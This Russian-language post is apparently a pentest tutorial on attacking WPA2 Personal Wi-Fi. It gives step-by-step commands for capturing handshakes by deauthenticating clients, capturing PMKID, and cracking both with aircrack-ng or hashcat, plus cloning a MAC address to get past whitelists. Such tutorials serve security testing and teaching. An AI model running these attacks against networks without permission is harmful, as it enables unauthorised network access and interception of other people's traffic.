Всем привет! 👋Сегодня немного поговорим о том, как пентестить Wi-Fi сети, а именно WPA2 Personal. Берите чашечку кофе и присаживайтесь.☕️


WPA2 Personal🐈‍⬛

Самый популярный протокол, используемый в персональных сетях Wi-Fi на данный момент, — это WPA2. Новая версия, WPA3, постепенно отвоёвывает себе место под солнцем👊, но всё ещё встречается гораздо реже. Более старые протоколы WEP и WPA практически не используются.

🔘 Первым типом атаки на WPA2, который рассмотрим, является перехват handshake, во время которого клиент и точка доступа обмениваются ключами. 🔑

Для данной атаки будем использовать утилиты семейства aircrack-ng (также можно использовать утилиту airgeddon для удобства).

🔹 Для начала необходимо включить режим мониторинга сети у интерфейса:

sudo airmon-ng start wlan0

Иногда может выскакивать сообщенияу с просьбой “убить” процессы, которые могут помещать перевести наш интерфейс в режим мониторинга.

Для этого достаточно ввести команду airmon-ng check kill.

🔹 Следующим шагом будем поиск доступных сетей Wi-Fi и клиентов. Сделать это можно будет с помощью утилиты airodump-ng. Флаг -w позволит сохранит результаты сканирования.

sudo airodump-ng wlan0mon -c 1 -w NETWORK

🔹 Иногда полезно посмотреть карту точек доступа и подключенных к ним клиентов, чтобы понять на какую точку доступа нам нацелиться. Сделать это можно с помощью утилиты airgraph-ng. В параметрах передаем тип изображения, который хотим сохранить, а также файл с результатами сканирования:

sudo airgraph-ng -i NETWORK.csv -g CAPR -o NETWORK.png

После определения нашей цели мы можем подождать пока кто-то подключиться к точке доступа или же начать деаутентификацию клиентов уже подключенных к точке.

🔹 Для начала настроим airodump на захват пакетов с определенной точки доступа и канала:

sudo airodump-ng -c 11 wlan0mon --essid wifinet -w NETWORK

🔹 Деаутентификацию клиентов выполним с помощью утилиты aireplay-ng:

sudo aireplay-ng -0 5 -a 60:3E:41:FE:30:83 -c 5C:12:B1:9B:ED:1A wlan0mon

Это заставит клиента переподключиться к точке доступа, что позволит нам перехватить handshake.📞

После захвата handshake airodump-ng выведет соответствующее сообщение:

kali@kali[/wifi]$ airodump-ng wlan0mon -c 1 -w NETWORK
06:11:03  Created capture file "NETWORK.cap".

🔹 Однако не стоит сразу сломя голову начать брутить handshake. Очень часто утилита airodump захватывает не все нужные нам пакеты (а их 4). Поэтому стоит взглянуть на захваченный файл и проверить, а все ли дома. Сделать это можно в ручную с помощью Wireshark или с помощью утилит cowpatty.

kali@kali[/wifi]$ cowpatty -c -r NETWORK
capcowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.

Данное сообщение означает, что все в порядке и можем смело брутить наш файл.

🔹 Для брутфорсе захваченного handshake подойдет cowpatty или aircrack-ng.

sudo aircrack-ng -w wordlist.txt -0 NETWORK.cap

<продолжение>


🔘 Следующий тип атаки на WPA2 Personal это захват PMKID.

PMKID (Pairwise Master Key Identifier) — это идентификатор, используемый в протоколе WPA/WPA2 для установления защищённого соединения между клиентом и точкой доступа Wi-Fi. Подробнее можете прочитать тут:
🔗🔗🔗

Для выполнения данной атаки можем использовать утилиту hxcdumptool.

🔹Для начала надо запустить сканирование сети и определить уязвимые точки для атаки PMKID. (прим. в примере показа не последняя версия hcxdumptool).

hcxdumptool -i wlan0mon --enable_status=3

🔹 После определения уязвимой цели запускаем заново тулзу

hcxdumptool -i wlan0mon --enable_status=3 --filterlist_ap=С1:33:E7:F5:65:91 --filtermode=2 -o PMKID.pcap

В случае успеха мы получим следующее сообщение:

initialization of hcxdumptool 6.2.5...
warning possible interfere: NetworkManager is running with pid 101

...
[SNIP]

05:15:18 2412/1   0e2e37d6886d d8d63deb29d5  [PMKID:p243frfa5erfe3vf64w1922ew321be35e6462
 KDV:2]
...

🔹После успешного захвата PMKID необходимо преобразовать pcap файл в hash.

hcxpcapngtool -o hash PMKID.pcap

🔹Для взлома хэша можем воспользоваться утилитой hashcat с флагом -m 22000

hashcat -m 22000 --force hash wordlist.txt

Также необходимо помнить, что для точки доступа может быть настроен белый список mac-адресов, что не позволит нам подключиться в случае даже успешного перебора пароля. К счастью для атакующих, обойти данный механизм защиты можно легко с помощью утилиты macchanger.

Для этого отключаем наш интерфейс и присваиваем ему mac-адрес клиента. (помните, что перед подключением к точке доступа нам необходимо деаутентифицировать клиента, чей mac-адрес мы себе присвоили, иначе мы не сможем подключиться.)

sudo ifconfig wlan0 down
sudo macchanger wlan0 -m 3E:48:72:B7:62:2A
sudo ifconfig wlan0 up

В следующей части посмотрим уже на атаки на WPA Enterpise сети. А пока подписывайтесь на канал и приятного чтения.👋